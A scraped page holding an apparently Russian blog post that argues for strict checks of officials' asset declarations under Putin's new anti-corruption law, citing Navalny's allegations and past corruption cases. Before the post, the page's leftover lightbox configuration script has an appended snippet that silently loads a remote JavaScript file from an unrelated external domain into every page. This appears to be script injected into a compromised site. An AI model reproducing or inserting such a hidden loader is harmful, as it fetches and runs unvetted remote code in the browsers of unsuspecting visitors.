, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Станет ли работающим новый закон Путина о борьбе с коррупцией?

27 Апр

В третьем чтении Госдума одобрила антикоррупционный закон https://xn-----7kcbekeiftdh9amwkb4d2o.xn--p1ai/gosduma-odobrila-antikorruptsionnyiy-zakon.html     Путина, который позволяет обеспечить неотвратимость наказания и отсутствие возможности потратить незаконным путем полученные деньги.

Под проверку будут попадать сделки, сумма которых превысит доход всей семьи госслужащего.

Некоторые бизнесмены также будут привлечены к ответственности. В первую очередь это будут тесно  сотрудничающие с государством и регулярно выигрывающие тендеры на различные виды деятельности.

Если  гражданин  не сможет доказать легальное происхождение средств на покупку, ему грозит реальный срок до трех лет лишения свободы с конфискацией всего имущества, даже приобретенного на законно заработанные деньги.

Вот и появятся в стране средства для достойных зарплат бюджетникам, пенсий ветеранам труда, для лечения детей, которых могут вылечить только за границей.

Если является верной информация https://echo.msk.ru/blog/corruption/2415215-echo/   Алексея Навального о министре финансов Силуанове и зам министра обороны Цаликове, то  они явные кандидаты на  применение к ним законодательных  инициатив Путина.

Счётная палата не раз публично информировала https://www.kommersant.ru/doc/3953358?utm_source=yxnews&utm_medium=desktop  россиян о миллиардных разворовываниях бюджетных средств.

Иногда у таких контролирующих лиц, как, например, полковник МВД Захарченко, находили почти 9 млрд рублей, 11 квартир, 4 автомобиля и 16 машиномест.

Недавно задержали https://www.novayagazeta.ru/news/2019/04/26/151230-sud-arestoval-glavu-otdela-fsb-cherkalina-po-delu-o-poluchenii-vzyatok?utm_source=yxnews&utm_medium=desktop    ещё группу лиц уже из ФСБ, которые осуществляли контрразведку в кредитно-финансовой сфере.

В ходе обысков в кабинете и дома у одного из фигурантов дела были изъяты крупные суммы денег, коллекции часов и драгоценности. Предполагается, что это будет второй Захарченко.

Во всех этих историях поражает то, что они, эти коррупционеры, подавали декларации, указывая в них своё имущество.

Но проверяющие их декларации, возможно, были люди наивные. Они не проверяли, насколько задекларированное имущество соответствует тем фактическим правовым доходом чиновника, что он имел.

Ещё в 2015 году глава Администрации Президента Сергей Иванов утверждал  https://www.mk.ru/politics/2015/11/02/sergey-ivanov-deklaracii-khoroshavina-i-gayzera-chishhe-slezy-papy-rimskogo.html , что декларации фигурантов главных коррупционных скандалов сезона — губернаторов Сахалина и Коми, Александра Хорошавина и Вячеслава Гайзера, «были чисты, как слеза из Папиного глаза» (имелся в виду Папа Римский).

То есть уже  тогда было ясно, что декларации не позволяют поймать за руку даже самых очевидных мздоимцев.

События, связанные с членом правительства Улюкаевым давали основания для проверки всего состава министров, осуществляющих исполнительную власть на наличие или отсутствие у них «сомнительной собственности», но этого не случилось.

Ни дня не работавший в бизнесе министр, обладал собственностью на миллиард, которую на зарплату министра он заиметь не мог.

И вот новые, конечно, требующие проверки, данные о министре финансов Силуанове и зам министра обороны Цаликове.

События, связанные с декларированием выявили следующую закономерность. Сведения, содержащиеся в декларациях, либо содержат данные об имуществе, которое чиновник не смог  приобрести на правомерные доходы,    либо сведения  не соответствуют  тому, чем фактически чиновник обладает.

Конечно, эту проверочную работу даже весь состав Администрации Президента Путина, осуществить не может. Слишком  она огромна в каждом регионе.

Поэтому начинать надо с лиц, осуществляющих исполнительную власть на федеральном уровне. Тогда и региональные чиновники поумерят свои потребности.

Декларации каждого федерального министра         должны быть проверены на соответствие их сведениям о фактическом обладании имуществом министра, а также о фактическом приобретении этого имущества на законные средства.

Такую же проверку должны пройти декларации сотрудников МВД, ФСБ, МЧС, СКР, Таможни.

Информация Алексея Навального о наличии «сомнительной собственности» у министра финансов Силуанова и зам. министра обороны Цаликова,  является убедительной. Его метод определения «сомнительной собственности» можно рекомендовать тем службам, что будут реализовывать законодательную инициативу Путина.

Сегодня  такую работу  может  проделать только Генеральная Прокуратура РФ. Там ещё сохранились специалисты, знающие, что такое доказательства и доказывание. Они способны сделать правильные расчёты по вопросам наличия или отсутствия «сомнительной собственности» у конкретного чиновника.

Раздражительность в обществе жизнью чиновников не по средствам, разворовыванием миллиардами общенародного достояния -  казны, только нарастает. Поэтому, от призывов борьбы с коррупцией, Путину пора переходить к решительным мерам к предателям-назначенцам.

Для него борьба с коррупцией должна быть делом чести, которую готовы поддержать миллионы россиян. Для них это уже давно является никак не реализуемой национальной  идеей -  обязать лиц,  осуществляющих государственную власть, признавать, соблюдать и защищать права и свободы человека и гражданина, а также жить по средствам.

Страна не может нормально развиваться, если лица, осуществляющие государственную власть, живут на не законно заработанные деньги.

Полагаю, что за пять лет Путин способен освободиться от предателей-назначенцев, а также установить в России власть Конституции, обеспеченную её гарантом и правосудием, став именно тем новым лицом, которого россияне давно ждут.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.